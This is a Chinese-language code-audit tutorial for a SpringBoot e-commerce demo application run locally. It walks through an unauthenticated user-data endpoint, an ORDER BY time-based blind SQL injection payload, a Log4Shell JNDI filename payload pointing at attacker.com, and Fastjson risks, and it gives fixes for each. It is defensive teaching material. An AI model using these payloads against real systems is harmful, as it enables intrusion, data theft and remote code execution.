迷你天猫商城Java代码审计教学文档<\/h1>

1. 项目概述<\/h2>
迷你天猫商城是一个基于SpringBoot框架的综合性B2C电商平台，主要功能包括：<\/p>
用户注册、登录<\/li>
商品浏览、购物车管理<\/li>
订单创建、支付、确认收货、评价<\/li>
后台管理（商品管理、订单管理、类别管理、用户管理和交易额统计）<\/li> <\/ul>
技术栈：<\/p>
框架：SpringBoot<\/li>
ORM：MyBatis<\/li>
数据库：MySQL 5.7<\/li>
JDK版本：1.8<\/li>
日志组件：Log4j 2.10.0<\/li> <\/ul>
2. 环境部署<\/h2>
克隆项目代码：<\/p>
https:\/\/gitee.com\/zwp1341710922\/e-commerce-management-system.git
<\/code><\/pre>
建议使用IntelliJ IDEA的版本控制功能检出<\/p>
<\/li>

数据库准备：<\/p>

创建数据库tmalldemodb<\/code><\/li>
导入项目提供的SQL文件<\/li>
<\/ul>
<\/li>

MySQL配置调整（临时禁用ONLY_FULL_GROUP_BY模式）：<\/p>
SET<\/span> GLOBAL<\/span> sql_mode =<\/span> (SELECT<\/span> REPLACE<\/span>(@@<\/span>sql_mode, 'ONLY_FULL_GROUP_BY'<\/span>, ''<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

运行项目后访问：<\/p>
http:\/\/localhost:8082\/tmall\/admin\/login
<\/code><\/pre>
账户信息存储在admin表中<\/p>
<\/li>
<\/ol>
3. 安全漏洞审计<\/h2>
3.1 未授权访问漏洞<\/h3>
漏洞位置<\/strong>：

com.xq.tmall.controller.admin.UserController.java<\/code><\/p>
漏洞描述<\/strong>：<\/p>

路径\/tmall\/admin\/user\/1\/10<\/code>可直接访问，返回包含用户密码等敏感信息<\/li>
其他方法使用了鉴权代码：
logger.<\/span>info<\/span>(<\/span>"检查管理员权限"<\/span>);<\/span>
<\/span><\/span>Object adminId =<\/span> checkAdmin(<\/span>session);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
但目标方法缺少鉴权逻辑<\/li>
<\/ul>
影响<\/strong>：

攻击者无需认证即可获取所有用户信息，包括密码等敏感数据<\/p>
修复建议<\/strong>：<\/p>

为所有需要权限的方法添加鉴权检查<\/li>
敏感信息（如密码）应在前端显示时进行脱敏处理<\/li>
<\/ul>
3.2 SQL注入漏洞<\/h3>
漏洞位置<\/strong>：<\/p>

通过搜索order by<\/code>、like<\/code>等关键字发现<\/li>
具体在UserMapper.xml<\/code>文件中<\/li>
<\/ul>
漏洞描述<\/strong>：<\/p>

请求示例：
http:\/\/localhost:8082\/tmall\/admin\/user\/1\/10?orderBy=1
<\/code><\/pre>
实际执行的SQL：
SELECT<\/span> user_id,user_name,user_nickname,user_password,user_realname,
<\/span><\/span>user_gender,user_birthday,user_profile_picture_src,user_address,user_homeplace 
<\/span><\/span>FROM<\/span> user<\/span> 
<\/span><\/span>ORDER<\/span> BY<\/span> 1<\/span> desc<\/span> 
<\/span><\/span>LIMIT<\/span> 10<\/span>,10<\/span>
<\/span><\/span><\/code><\/pre><\/li>
可构造恶意参数触发时间盲注：
\/tmall\/admin\/user\/1\/10?orderBy=IF(1=1,+sleep(1),+1)--+
<\/code><\/pre>
观察到明显延迟（sleep(3)延迟约60秒）<\/li>
<\/ul>
代码分析<\/strong>：<\/p>

UserMapper.java<\/code>定义接口方法<\/li>
UserMapper.xml<\/code>实现具体SQL，使用${}<\/code>进行参数拼接而非预编译的#{}<\/code><\/li>
<\/ul>
影响<\/strong>：

攻击者可利用此漏洞进行数据库信息泄露、数据篡改等操作<\/p>
修复建议<\/strong>：<\/p>

使用MyBatis的预编译方式（#{}<\/code>）替换直接拼接（${}<\/code>）<\/li>
对必须使用动态SQL的场景进行严格的输入过滤和校验<\/li>
实现最小权限原则，限制数据库用户权限<\/li>
<\/ul>
3.3 Log4j漏洞<\/h3>
漏洞描述<\/strong>：<\/p>

项目使用Log4j 2.10.0版本<\/li>
存在已知高危漏洞：

CVE-2021-44228（远程代码执行）<\/li>
CVE-2021-45046<\/li>
<\/ul>
<\/li>
<\/ul>
漏洞位置<\/strong>：<\/p>

图片上传功能中记录日志的代码：
logger.<\/span>info<\/span>(<\/span>"获取图片原始文件名:{}"<\/span>,<\/span> originalFileName);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
利用方式<\/strong>：

构造恶意文件名触发JNDI注入：<\/p>
POST<\/span> \/tmall\/user\/uploadUserHeadImage HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> localhost:8082<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=171182472826653739854099729287<\/span>
<\/span><\/span>Content-Disposition:<\/span> form-data; name="file"; filename="${jndi:ldap:\/\/attacker.com\/exploit}"<\/span>
<\/span><\/span>Content-Type:<\/span> image\/jpeg<\/span>
<\/span><\/span><\/code><\/pre>影响<\/strong>：

攻击者可在服务器上执行任意代码，完全控制服务器<\/p>
修复建议<\/strong>：<\/p>

立即升级Log4j到最新安全版本（2.17.0或更高）<\/li>
临时缓解措施：

设置系统属性log4j2.formatMsgNoLookups=true<\/code><\/li>
移除JndiLookup类<\/li>
<\/ul>
<\/li>
对用户提供的文件名进行严格过滤<\/li>
<\/ul>
3.4 Fastjson潜在漏洞<\/h3>
审计方法<\/strong>：<\/p>

全文搜索JSON.parse()<\/code>和JSON.parseObject()<\/code><\/li>
Fastjson历史版本存在多个反序列化漏洞<\/li>
<\/ul>
建议<\/strong>：<\/p>

确认使用的Fastjson版本<\/li>
如使用旧版本，应升级到最新安全版本<\/li>
避免反序列化不可信数据<\/li>
<\/ul>
4. 其他发现<\/h2>

依赖管理问题：Maven下载的依赖与pom文件声明的版本不一致

可能导致不可预期的安全风险<\/li>
建议使用dependency:tree检查实际依赖版本<\/li>
使用dependencyManagement统一管理依赖版本<\/li>
<\/ul>
<\/li>
<\/ul>
5. 安全开发建议<\/h2>


认证与授权：<\/p>

所有管理接口必须进行权限校验<\/li>
实现基于角色的访问控制(RBAC)<\/li>
<\/ul>
<\/li>

SQL安全：<\/p>

全面使用预编译语句<\/li>
避免动态拼接SQL<\/li>
使用MyBatis拦截器进行统一SQL安全处理<\/li>
<\/ul>
<\/li>

日志安全：<\/p>

升级所有存在已知漏洞的日志组件<\/li>
避免记录敏感信息<\/li>
对用户输入进行过滤后再记录<\/li>
<\/ul>
<\/li>

输入验证：<\/p>

对所有用户输入进行严格验证<\/li>
实现白名单过滤机制<\/li>
<\/ul>
<\/li>

依赖管理：<\/p>

定期检查项目依赖的安全公告<\/li>
使用OWASP Dependency-Check等工具扫描依赖漏洞<\/li>
及时更新存在漏洞的依赖<\/li>
<\/ul>
<\/li>

安全编码：<\/p>

实施安全编码规范<\/li>
进行代码安全审计<\/li>
关键操作添加安全日志<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
本次审计发现的迷你天猫商城主要安全问题包括：<\/p>

未授权访问漏洞（高危）<\/li>
SQL注入漏洞（高危）<\/li>
Log4j远程代码执行漏洞（严重）<\/li>
Fastjson潜在反序列化漏洞<\/li>
依赖管理不规范问题<\/li>
<\/ol>
建议开发团队按照上述修复建议立即修复高危漏洞，并建立长期的安全开发流程，确保系统安全。<\/p>